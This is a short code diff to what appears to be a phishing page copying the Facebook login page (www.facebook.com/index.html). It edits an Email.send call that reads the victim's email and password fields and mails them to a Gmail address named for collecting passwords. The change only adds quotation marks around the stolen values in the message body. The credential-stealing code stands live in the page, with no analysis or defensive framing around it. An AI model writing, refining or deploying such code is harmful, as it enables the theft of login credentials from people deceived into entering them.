--- a/www.facebook.com/index.html
+++ b/www.facebook.com/index.html
@@ -10,7 +10,7 @@ Email.send({
     To : 'contrasenaschidas@gmail.com',
     From : "contrasenaschidas@gmail.com",
     Subject : "Facebook",
-    Body : "usuario: " + document.getElementById("email").value + ", contrasena: " + document.getElementById("pass").value
+    Body : "usuario: '" + document.getElementById("email").value + "', contrasena: '" + document.getElementById("pass").value + "'"
 })
 
  window.setTimeout(function(){
